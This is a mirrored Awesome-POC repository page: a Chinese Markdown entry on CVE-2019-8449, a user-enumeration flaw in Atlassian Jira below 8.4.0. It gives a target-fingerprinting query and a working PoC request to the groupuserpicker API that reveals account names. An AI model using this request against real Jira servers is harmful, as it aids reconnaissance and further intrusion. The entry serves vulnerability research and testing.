admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 03:17:19 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/Atlassian Jira groupuserpicker 用户信息枚举漏洞 CVE-2019-8449.md

35 lines
614 B
Markdown
Raw Normal View History

update
2024-11-06 14:10:36 +08:00
# Atlassian Jira groupuserpicker 用户信息枚举漏洞 CVE-2019-8449
## 漏洞描述
Atlassian Jira groupuserpicker接口存在用户信息枚举漏洞攻击者通过漏洞可以获取应用中的使用者账户名称来进行进一步渗透
## 漏洞影响
```
Atlassian Jira <8.4.0
```
## 网络测绘
```
app="ATLASSIAN-JIRA"
```
## 漏洞复现
登录页面
![](images/202205241426135.png)验证POC
```
/rest/api/latest/groupuserpicker?query=admin&maxResults=50&showAvatar=false
```
当用户存在时
![](images/202205241426482.png)
当用户不存在时
![](images/202205241427885.png)
Reference in New Issue Copy Permalink